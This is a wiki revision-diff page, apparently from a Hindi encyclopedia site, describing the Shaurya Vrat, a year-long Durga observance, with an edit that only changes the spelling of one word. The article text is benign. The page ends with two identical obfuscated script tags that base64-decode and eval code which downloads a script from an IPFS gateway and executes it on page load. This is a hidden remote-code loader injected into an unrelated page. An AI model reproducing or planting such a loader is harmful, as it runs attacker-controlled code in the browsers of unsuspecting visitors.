Difference between revisions of "शौर्य व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replacement - " मां " to " माँ ")
 
Line 2: Line 2:
 
*[[आश्विन]] [[शुक्ल पक्ष]] की [[सप्तमी]] पर संकल्प, [[अष्टमी]] पर उपवास, [[नवमी]] पर आटे से बना भोजन एवं दुर्गा पूजा तथा ब्रह्मभोज होता है।
 
*[[आश्विन]] [[शुक्ल पक्ष]] की [[सप्तमी]] पर संकल्प, [[अष्टमी]] पर उपवास, [[नवमी]] पर आटे से बना भोजन एवं दुर्गा पूजा तथा ब्रह्मभोज होता है।
 
*एक वर्ष तक यही विधि चलती है।
 
*एक वर्ष तक यही विधि चलती है।
*[[दुर्गा]] मां की पूजा होती है।
+
*[[दुर्गा]] माँ की पूजा होती है।
 
*अन्त में कुमारियों को भोजन तथा उन्हें वस्त्र आदि का दान तथा 'देवी मुझ पर प्रसन्न हों' से प्रार्थना की जाती है।
 
*अन्त में कुमारियों को भोजन तथा उन्हें वस्त्र आदि का दान तथा 'देवी मुझ पर प्रसन्न हों' से प्रार्थना की जाती है।
 
*बिना विद्या पढ़े ज्ञान की उत्पत्ति, दुर्बल व्यक्ति शौर्य बाला हो जाता है, लुप्त राज्य प्राप्त हो जाता है।<ref>[[वराह पुराण]] (64,1-6); कृत्यकल्पतरु (व्रतखण्ड 273); हेमाद्रि (व्रतखण्ड 1, 957-958); कृत्यरत्नाकर (364-365)।</ref>
 
*बिना विद्या पढ़े ज्ञान की उत्पत्ति, दुर्बल व्यक्ति शौर्य बाला हो जाता है, लुप्त राज्य प्राप्त हो जाता है।<ref>[[वराह पुराण]] (64,1-6); कृत्यकल्पतरु (व्रतखण्ड 273); हेमाद्रि (व्रतखण्ड 1, 957-958); कृत्यरत्नाकर (364-365)।</ref>

Latest revision as of 14:08, 2 June 2017

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ashvin shukl paksh ki saptami par sankalp, ashtami par upavas, navami par ate se bana bhojan evan durga pooja tatha brahmabhoj hota hai.
  • ek varsh tak yahi vidhi chalati hai.
  • durga maan ki pooja hoti hai.
  • ant mean kumariyoan ko bhojan tatha unhean vastr adi ka dan tatha 'devi mujh par prasann hoan' se prarthana ki jati hai.
  • bina vidya padhe jnan ki utpatti, durbal vyakti shaury bala ho jata hai, lupt rajy prapt ho jata hai.[1]


tika tippani aur sandarbh

  1. varah puran (64,1-6); krityakalpataru (vratakhand 273); hemadri (vratakhand 1, 957-958); krityaratnakar (364-365).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>